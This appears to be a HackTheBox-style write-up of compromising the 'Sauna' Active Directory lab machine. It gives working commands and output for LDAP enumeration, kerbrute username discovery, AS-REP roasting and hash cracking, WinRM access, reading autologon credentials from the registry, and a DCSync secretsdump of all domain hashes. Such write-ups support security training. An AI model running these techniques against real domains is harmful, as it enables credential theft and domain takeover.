Overview
The machine starts with LDAP null-bind enumeration and website OSINT, which reveal staff names for building a username list. Using kerbrute with downgraded encryption we find that fsmith does not require Kerberos pre-authentication, AS-REP roast the account, crack the hash and get WinRM access. winPEAS then reveals autologon credentials for svc_loanmgr stored in the registry; that account has DCSync rights, so we dump the domain hashes and pass-the-hash as Administrator for root.
Enumeration
As usual, we start with an nmap scan:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.95.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-08 23:57 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating Ping Scan at 23:57
Scanning 10.129.95.180 [2 ports]
Completed Ping Scan at 23:57, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.10s elapsed
Initiating Connect Scan at 23:57
Scanning 10.129.95.180 [1000 ports]
Discovered open port 139/tcp on 10.129.95.180
Discovered open port 135/tcp on 10.129.95.180
Discovered open port 80/tcp on 10.129.95.180
Discovered open port 53/tcp on 10.129.95.180
Discovered open port 445/tcp on 10.129.95.180
Discovered open port 88/tcp on 10.129.95.180
Discovered open port 3268/tcp on 10.129.95.180
Discovered open port 636/tcp on 10.129.95.180
Discovered open port 389/tcp on 10.129.95.180
Discovered open port 464/tcp on 10.129.95.180
Discovered open port 593/tcp on 10.129.95.180
Discovered open port 3269/tcp on 10.129.95.180
Completed Connect Scan at 23:57, 7.78s elapsed (1000 total ports)
Initiating Service scan at 23:57
Scanning 12 services on 10.129.95.180
Completed Service scan at 23:57, 15.25s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.95.180.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:57
Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 99.94% done; ETC: 23:58 (0:00:00 remaining)
Completed NSE at 23:58, 40.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 4.10s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
Nmap scan report for 10.129.95.180
Host is up, received syn-ack (0.11s latency).
Scanned at 2026-06-08 23:57:24 PDT for 67s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2026-06-09 13:57:40Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 38495/tcp): CLEAN (Timeout)
|   Check 2 (port 47005/tcp): CLEAN (Timeout)
|   Check 3 (port 10224/udp): CLEAN (Timeout)
|   Check 4 (port 63831/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h00m00s
| smb2-time:
|   date: 2026-06-09T13:57:52
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:58
Completed NSE at 23:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.30 seconds
We have an Active Directory environment with the domain EGOTISTICAL-BANK.LOCAL on host SAUNA, plus a 7-hour clock skew, which matters if we are going to deal with Kerberos: by default the KDC rejects requests whose timestamp is more than 5 minutes off its own clock.
So let's set up the environment and move on: add a hosts entry, sync our clock to the DC (ntpdate steps the system clock; faketime is an alternative if you would rather not touch it) and let nxc generate a krb5.conf for the realm.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ echo '10.129.95.180 EGOTISTICAL-BANK.LOCAL' | sudo tee -a /etc/hosts
10.129.95.180 EGOTISTICAL-BANK.LOCAL
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ sudo ntpdate EGOTISTICAL-BANK.LOCAL
2026-06-09 07:02:18.965036 (-0700) +25201.171696 +/- 0.037343 EGOTISTICAL-BANK.LOCAL 10.129.95.180 s1 no-leap
CLOCK: time stepped by 25201.171696
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u '' -p '' --generate-krb5-file krb5.conf
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] krb5 conf saved to: krb5.conf
SMB 10.129.95.180 445 SAUNA [+] Run the following command to use the conf file: export KRB5_CONFIG=krb5.conf
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ sudo mv krb5.conf /etc/krb5.conf
Guest and Null bind
I always start by listing the shares accessible to the Guest account, but in this case the account is disabled:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u 'Guest' -p '' --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\Guest: STATUS_ACCOUNT_DISABLED
I also tried a null bind against LDAP. It is accepted, but listing the users returns nothing:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u '' -p ''
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc ldap 10.129.95.180 -u '' -p '' --users
LDAP 10.129.95.180 389 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.95.180 389 SAUNA [+] EGOTISTICAL-BANK.LOCAL\:
LDAP 10.129.95.180 389 SAUNA [*] Enumerated 0 domain users: EGOTISTICAL-BANK.LOCAL
LDAP 10.129.95.180 389 SAUNA -Username- -Last PW Set- -BadPW- -Description-
Usually that is odd, but I had a similar case recently: the users were not in the default Users container but in a custom OU, or the anonymous bind simply had restricted read access. Let's use ldapsearch to list every object under the domain root and try to make sense of it.
I use the domain root as the search base and a filter that matches every object class:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ ldapsearch -H ldap://10.129.95.180 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" "(objectClass=*)"
This is a snippet of the output. The only thing that looks like a user is this Hugo Smith object, which sits directly under the domain root rather than in CN=Users, so let's enumerate it further.
# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
So even though the null bind is accepted, read access is restricted: requesting every attribute of Hugo Smith's object returns nothing but the DN. Still, a real name should be enough to derive a username and check later whether the account requires Kerberos pre-authentication.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ ldapsearch -H ldap://10.129.95.180 -x -b "CN=Hugo Smith,dc=EGOTISTICAL-BANK,dc=LOCAL" "*"
# extended LDIF
#
# LDAPv3
# base <CN=Hugo Smith,dc=EGOTISTICAL-BANK,dc=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: *
#
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
I generated a list of candidate usernames from Hugo's name, since I did not know the domain's naming convention:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ username-anarchy Hugo Smith
hugo
hugosmith
hugo.smith
hugosmit
hugos
h.smith
hsmith
shugo
s.hugo
smithh
smith
smith.h
smith.hugo
hs
With that list, kerbrute confirms hsmith is a valid username, but it is not AS-REP roastable: the account still requires pre-authentication, so the KDC answers with KDC_ERR_PREAUTH_REQUIRED instead of an encrypted AS-REP.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --downgrade --dc 10.129.95.180 hugo.usernames
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop
2026/06/09 07:23:34 > Using downgraded encryption: arcfour-hmac-md5
2026/06/09 07:23:34 > Using KDC(s):
2026/06/09 07:23:34 > 10.129.95.180:88
2026/06/09 07:23:34 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2026/06/09 07:23:34 > Done! Tested 14 usernames (1 valid) in 0.436 seconds
So for now we have nothing but a username. Brute-forcing its password would take too long, would risk locking the account out, and does not look like the intended path.
Website
I almost missed this in the nmap results. HTTP is exposed and I assumed it was the default IIS page, but looking back, the page title belongs to the bank, so let's take a look:
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
It is a static site, but the about.html page leaks more possible usernames besides hsmith, and it also tells us the naming convention: first initial plus last name, flast in username-anarchy terms (Hugo Smith became hsmith). Let's put the staff names in a file and generate their usernames.

The command looks like this; check the help for more options:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ username-anarchy --input-file ./staff.txt --select-format flast
fsmith
scoins
hbear
btylor
sdriver
skerb
We get one more valid username, and this time the account is AS-REP roastable. A note on --downgrade: it makes kerbrute request RC4-HMAC (etype 23) in the AS-REQ instead of AES (etype 17/18). The etype 23 key is the NT hash, a single MD4 over the UTF-16LE password, so each candidate costs one MD4 and a few HMAC-MD5s and hashcat mode 18200 runs at hundreds of kH/s even on a CPU. AES keys are derived with 4096 iterations of PBKDF2-HMAC-SHA1, so an etype 18 AS-REP (hashcat mode 32200) is orders of magnitude slower. Whether the DC honours the RC4 request depends on the account's msDS-SupportedEncryptionTypes and the KDC's policy; without --downgrade you get whichever etype the DC prefers, here AES-256.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --downgrade --dc 10.129.95.180 usernames.txt
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop
2026/06/09 07:32:12 > Using downgraded encryption: arcfour-hmac-md5
2026/06/09 07:32:12 > Using KDC(s):
2026/06/09 07:32:12 > 10.129.95.180:88
2026/06/09 07:32:12 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c70f1a164cacf53deee90fec84d355c2$3f742bb7635f6519cc259475fbf9212e63b16e9b01163ee98f2592fc89d16cefccc7ad31e9da7c1f02eff29cf018398479f1be73f8d76bcf3417d8385b8d108a474946a0fecf73c1435699f84aedc8bfc6cec4c8523977ed615aa8c5c9b141f112939e291a2aeb7616c3d250f4af9fc037c239821b12162867c506e57c6876ee2254abd2416cfebf3967ae49bd7c97b5034c86db01dddd3df26e3a2bf59ec934929ffef41645fa979054fe691e5a2d5254a9b0ac91ed30fe35c54959e54ce475c468f2152d5f16bd6eba3c3f538ec44265ffbd32ae699d733f68e4dcd22f690d1957f6c066f973cdcde765ebf567e8f0296ec9e514bd377b587e2cec16ad08d7
2026/06/09 07:32:12 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
For comparison, here is the same request without --downgrade. The DC answers with etype 18 (AES256-CTS-HMAC-SHA1-96), which is far slower to crack:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.129.95.180 usernames.txt
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: dev (n/a) - 06/09/26 - Ronnie Flathers @ropnop
2026/06/09 07:32:58 > Using KDC(s):
2026/06/09 07:32:58 > 10.129.95.180:88
2026/06/09 07:32:58 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:f72e72093ac843cd3bbb4b00151f90bd$...
2026/06/09 07:32:58 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2026/06/09 07:32:58 > Done! Tested 6 usernames (1 valid) in 0.243 seconds
One last thing to prove the point. Here the etype 18 hash was run through hashcat mode 18200, the etype 23 algorithm, so hashcat tested the wrong key derivation and exhausting rockyou proves nothing. The correct mode for an etype 18 AS-REP is 32200, and because every candidate costs 4096 PBKDF2-HMAC-SHA1 iterations it would take far longer:
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:ed83c8b...8873e1
Time.Started.....: Tue Jun 9 07:35:38 2026 (22 secs)
Time.Estimated...: Tue Jun 9 07:36:00 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 673.4 kH/s (2.26ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: kristenanne -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Util: 89%
The etype 23 hash, on the other hand, cracks in seconds with mode 18200 and gives us fsmith's password:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:cd7487fab51e2e9ad69467c41ea0b77d$9d7827aba331b7cf0100352d62bbafdb21ac308ce20f3cea3f2e4992d9ad544e5416889c1aeab953e844f0a25e8f32203495d009d15dd3ab19fd4904455146254be8fa4e0556bb1a4066ef69f31a47067d09475e19782b0bc4f4dfc5b2b3c4902e7f17b23a23a3c8a348f3cab76f922630cc77afa17cdc3889bbc12e070c4134ce228241e74647ec612c0d9e29da4b8ca101fc2a90a1aa73a008f754409ff93463802867f122b9ae592785356a26e21094e4fdc5e76663f4b9bfa84dc33c4e8fd041979af99ebf36514d90e3113f6990b123b43cbe31727c215f436219243746f9cf6e67da99d3eb359712930b6684abd0199ba0d7bada606b7f52e7128d9ca9:Thestrokes23
Approaching final keyspace - workload adjusted.
Shell as fsmith
The credentials work over SMB, and there is a share we can write to:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u fsmith -p Thestrokes23 --shares
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
SMB 10.129.95.180 445 SAUNA [*] Enumerated shares
SMB 10.129.95.180 445 SAUNA Share Permissions Remark
SMB 10.129.95.180 445 SAUNA ----- ----------- ------
SMB 10.129.95.180 445 SAUNA ADMIN$ Remote Admin
SMB 10.129.95.180 445 SAUNA C$ Default share
SMB 10.129.95.180 445 SAUNA IPC$ READ Remote IPC
SMB 10.129.95.180 445 SAUNA NETLOGON READ Logon server share
SMB 10.129.95.180 445 SAUNA print$ READ Printer Drivers
SMB 10.129.95.180 445 SAUNA RICOH Aficio SP 8300DN PCL 6 WRITE We cant print money
SMB 10.129.95.180 445 SAUNA SYSVOL READ Logon server share
We can also reach WinRM (fsmith is in Remote Management Users), so let's get a shell:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc winrm 10.129.95.180 -u fsmith -p Thestrokes23
WINRM 10.129.95.180 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.129.95.180 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
And we have the user flag:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ winrmexec EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23@10.129.95.180
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using 10.129.95.180
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://10.129.95.180:5985/wsman
PS C:\Users\FSmith\Documents> cat ../Desktop/user.txt
0efd2e511c26676e9e3274b5c2f771b7
PS C:\Users\FSmith\Documents>
The privileges and groups for this user are unremarkable, so let's see whether we hold any rights over other objects in the domain.
PS C:\Users\FSmith\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\FSmith\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
I had BloodHound up and running, but nothing came back: fsmith is just a normal user with no outbound object control. So back to the shell to run winPEAS.
AutoLogon
Windows autologon passwords are stored credentials used by the operating system to automatically log into a specific user account during startup. This bypasses the login screen for convenience on kiosks, public displays and shared lab machines. When configured by hand in the registry, DefaultUserName and DefaultPassword sit in plaintext under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, which any local user can read; the Sysinternals Autologon tool instead stores the password as the LSA secret DefaultPassword, which standard users cannot read.
After running winPEAS, it reported an autologon password for a user:
╔══════════╣ Home folders found (T1083)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith : FSmith [Allow: AllAccess]
C:\Users\Public
C:\Users\svc_loanmgr
╔══════════╣ Looking for AutoLogon credentials (T1552.002)
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Logging in with it fails, because the username is not quite what the registry value says:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u svc_loanmanager -p Moneymakestheworldgoround!
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
Going back to BloodHound, I found that the user SVC_LOANMGR has DCSync rights (BloodHound draws that edge when a principal holds both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object), so let's try that username instead. The credentials are valid for it:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ nxc smb 10.129.95.180 -u svc_loanmgr -p Moneymakestheworldgoround!
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
A DCSync attack is a post-exploitation technique for stealing credentials directly from Active Directory. The attacker speaks the Directory Replication Service protocol (MS-DRSR, the DRSUAPI RPC interface) to a Domain Controller and asks it to replicate account secrets, exactly as another DC would during normal replication. The DC does not check that the caller is a DC; it only checks that the caller holds the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object, which is what svc_loanmgr has.
So let's dump the secrets and use the Administrator hash. The RemoteOperations error in the output is expected: svc_loanmgr is not a local administrator on the DC, so the registry-based methods fail and secretsdump falls back to DRSUAPI, which is the replication call DCSync uses.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/sauna]
└──╼ [★]$ secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.129.95.180
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:1119509eab6a39c955d23b5ce973aa62:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:cf50494e641a40faf3f587a5dc79d8492c161192ce866503aa2f0c4ed682d9b9
SAUNA$:aes128-cts-hmac-sha1-96:f5d2bcad4e4ae43f0b1f78b196cd6f63
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
